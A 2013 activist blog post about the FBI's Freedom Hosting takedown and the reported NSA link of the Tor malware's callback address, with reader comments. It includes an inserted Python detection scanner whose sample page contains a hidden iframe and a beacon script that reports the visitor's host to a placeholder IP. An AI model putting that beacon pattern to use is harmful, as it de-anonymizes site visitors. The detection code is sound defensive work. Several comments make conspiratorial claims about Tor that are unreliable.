Tuesday, August 6, 2013

NSA's Cyber Army Attacks the Navy's Tor Network, Gives Spoils to the FBI

Eric Blair
Activist Post

It was reported earlier this week that the FBI won a great victory by stopping the largest child porn distributor on the Internet. The FBI's victory lap was cut short when some of the details of how they did it were more closely examined.

What the FBI actually did was seize a hosting provider on Tor's hidden service network. The owner of that provider, Freedom Hosting, was not directly involved in the production or distribution of child porn; he provided anonymous hosting that pedophile pornographers used.

The bigger question became how the FBI penetrated the supposedly anonymous Tor network. That's where the story gets interesting.

Tor, short for The Onion Router, was originally developed at the U.S. Naval Research Laboratory to provide anonymous communications for government use. Supposedly the project was abandoned by the Navy only to be picked up by open-source volunteers who now run the Tor Project.

Despite its beginnings as a government project, most believe Tor to be the best current option for online anonymity. But does this recent attack on Tor users reveal that it's also part of the surveillance grid? The long answer is complicated, but the short answer is no.

First, the address that the malware used to take down Freedom Hosting reported back to has been traced to a block allocated to the NSA - not to the FBI, which claimed victory in the investigation and apprehension.

Arstechnica writes:
Malware planted on the servers of Freedom Hosting—the "hidden service" hosting provider on the Tor anonymized network brought down late last week—may have de-anonymized visitors to the sites running on that service. This issue could send identifying information about site visitors to an Internet Protocol address that was hard-coded into the script the malware injected into browsers. And it appears the IP address in question belongs to the National Security Agency (NSA).

Continued from Arstechnica:
Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia. 
Further analysis using a DNS record tool from Robtex found that the address was actually part of several blocks of IP addresses allocated by SAIC to the NSA. This immediately spooked the researchers.
Two things are important to note about this revelation. First, it is telling that the NSA had to resort to a browser exploit instead of its usual collection and decoding of Internet traffic, which still does not unmask users of Tor's encrypted, multi-hop network on its own. Second, the attack left evidence: the injected JavaScript was served to every visitor of the affected sites, so anyone who loaded one of those pages could read the script and find the hard-coded address it reported to, and that is how the address was traced.
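The inspection described above, as an added example that is not code from the article or from the researchers it cites: a small Python scanner that parses a page fetched from a hidden service and flags the things an injected beacon leaves behind, namely script, iframe or image sources that point at a literal IPv4 address or a non-.onion host, and iframes sized or styled to be invisible. The sample page is constructed for this example; the 192.0.2.10 address is from the RFC 5737 documentation range and is not the address reported in the article.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: a hidden-service login page with an injected
# hidden iframe and an inline beacon script reporting to a raw IP address.
SAMPLE_PAGE = """
<html><head><title>login</title></head><body>
<h1>Welcome</h1>
<script src="/static/app.js"></script>
<img src="https://cdn.example.net/pixel.gif">
<iframe src="http://192.0.2.10/content" width="0" height="0" style="visibility:hidden"></iframe>
<script>
  var x = new XMLHttpRequest();
  x.open("GET", "http://192.0.2.10/" + "?h=" + encodeURIComponent(location.host), true);
  x.send();
</script>
<a href="http://example3abc.onion/faq">FAQ</a>
</body></html>
"""

URL = re.compile(r"https?://([A-Za-z0-9.\-]+)(?::\d+)?")
DOTTED = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class _Collector(HTMLParser):
    """Collects src attributes of script/iframe/img tags, every iframe's
    attributes, and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.refs = []       # src values of script, iframe and img tags
        self.iframes = []    # attribute dicts of every iframe
        self.inline = []     # bodies of inline scripts
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "img") and a.get("src"):
            self.refs.append(a["src"])
        if tag == "iframe":
            self.iframes.append(a)
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data unparsed.
        if self._in_script and data.strip():
            self.inline.append(data)


def _is_hidden(attrs):
    """True for an iframe with zero width/height or a hiding style."""
    size_zero = attrs.get("width") == "0" or attrs.get("height") == "0"
    style = attrs.get("style", "").replace(" ", "").lower()
    return size_zero or "display:none" in style or "visibility:hidden" in style


def find_clearnet_callbacks(html):
    """Return sorted (kind, value) findings for references that leave the
    onion network: 'raw-ip' for a literal IPv4 host, 'clearnet-host' for
    any other non-.onion host, 'hidden-iframe' for an invisible iframe."""
    p = _Collector()
    p.feed(html)
    findings = set()
    for text in p.refs + p.inline:
        for m in URL.finditer(text):
            host = m.group(1)
            if DOTTED.match(host):
                findings.add(("raw-ip", host))
            elif not host.endswith(".onion"):
                findings.add(("clearnet-host", host))
    for a in p.iframes:
        if _is_hidden(a):
            findings.add(("hidden-iframe", a.get("src", "")))
    return sorted(findings)


if __name__ == "__main__":
    for kind, value in find_clearnet_callbacks(SAMPLE_PAGE):
        print(f"{kind:14} {value}")
```

Run against a page saved with the browser's "view source", the scanner lists every place the page tries to reach outside the onion network; a raw IP or a hidden iframe on a hidden-service page is exactly the signature that exposed the callback address in this case. It only inspects markup, so it will miss references assembled at run time from string fragments.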

The Tor Project identified the specific problem and advised people who want privacy to install the patched Tor Browser Bundle, stop using Windows, and disable JavaScript. The exploit payload targeted Windows only, and if the operating system itself is compromised it does not much matter how you reach the Internet. According to the Tor Project, the attack used JavaScript to trigger a Firefox vulnerability in older versions of the Tor Browser Bundle, one that the current release had already fixed; the Project's advisory did not name the attacker, so the NSA attribution rests on the IP address analysis above.

Some feel this entire attack is more about scaring people away from privacy tools such as Tor than about fighting child porn, because no actual pornographers were caught. They remained anonymous. Tor is still considered secure if used properly.

But just as it was announced that the Drug Enforcement Administration was using warrantless NSA data to "investigate" drug crimes, it's clear from this case that the FBI used the NSA's preemptive cyber attack on Tor users for its own "investigation".

Does anyone see a pattern of abuse forming yet? The government is illegally collecting, sharing and using our private data to drum up suspicion of criminal activity, and then acting on it.

They're hoping headlines like "taking down the world's largest child porn dealer" will justify crushing Internet freedom and privacy. Expect more victory laps by the FBI or DEA, and the NSA catching more "credible threats". Keeping us safe, one privacy breach at a time.

This article may be re-posted in full with attribution.

Anonymous said...

If TOR is so anonymous, I wonder how the NSA identified the "offending" server in the first place, in order to plant the malware.

Anonymous said...

With NSA's resources a brute-force approach may have been feasible. Deep packet inspection wouldn't work, so any analysis would be based on timing, packet size, destination and origin. Perhaps upload a unique file to any of the hidden sites, then connect a thousand clients from different IPs and track their traffic, latency etc. Even with just the metadata (obtained through mirroring backbone traffic) with enough time it would be possible to find out who's running the Yahoo equivalent of Tor.

That's assuming they didn't find a vulnerability in Freedom Hosting itself - keep in mind this operation already included the use of one 0day.

Chances are they vanned the Freedom Hosting admin and during his absence installed their own dial-home program.

Also, the IP points straight back to NSA. That's the malware equivalent of saving passwords as plaintext - you don't generally do that, but when you do, you do it explicitly and with a purpose.

And the purpose here is to build a dossier of incriminating materials on possible future thoughtcriminals as well as to spread fear and panic.

So the proper response would be to keep calm and carry on, paying more attention to security.

Anonymous said...

So NOTHING is safe from these guys!
EVERYTHING is a victim to their drilling technologies.

So, ALL YOUR financial data,
All stock portfolio data,
All retirement data,
All medical data,
All data of ANY TYPE....is accessed by the NSA.

This technology will drill into ALL YOUR DATA....FOREVER! Get that fact? They are going to be on your back forever!

No oversight, just blind trust....you're screwed!

Anonymous said...

must get the patched version of the TOR Browser Bundle, stop using Windows, and disable Javascript.

OK, I get the patched Tor, dump Java, but what could I use instead of Windows? I've been using it for years, so what other OS is like it or is viewed as safe?

Anglo Saxon said...

@ Anonymous ... August 7, 2013 at 6:30 PM: You're a hysterical mess. Sort yourself out you pathetic little shill.


@ Anonymous ... August 7, 2013 at 8:05 PM: Put down the Coca-Cola, and Big Mac with Fries, and recover your brain. These days, information on alternative O/Ss is easy to find. Pull your finger out and act!




** http://distrowatch.com/ ** !! Best resource !!

Anonymous said...

These are all military inventions to spread disinformation to the general public.
TOR was a Trojan horse designed to be abandoned and taken by people that wanted a complete package deal (aka a free ready-built web site); obviously they left a wide-open back door.
That way users could take administrative controls but still be just a user within the program.
It doesn't amaze me that the greedy would grab an intelligence agency's computer program and think that it's safe to use freely.

Anonymous said...

Zorin is a Linux distro close to Windows.

Anonymous said...

Use TAILS and boot from USB for TOR business.


Anonymous said...

Note that this was not a vulnerability of Tor but rather (most likely) a problem on the Freedom Hosting guy's end.

Also: there are I2P and Freenet as alternatives to Tor. And it's recommended to boot Tails (http://tails.boum.org/) for Tor.

Also don't forget to turn off the scripts in the Tor Browser Bundle and to update it right after there's a new patch out.

0jr said...

you're a fool if you ever thought it was safe and they ain't running it

Anonymous said...

Try Ubuntu Linux. Easy and looks somewhat like Windows out of the box. Even has an app store (GUI front end to its package manager, APT). I prefer Arch and Debian, but that's me.
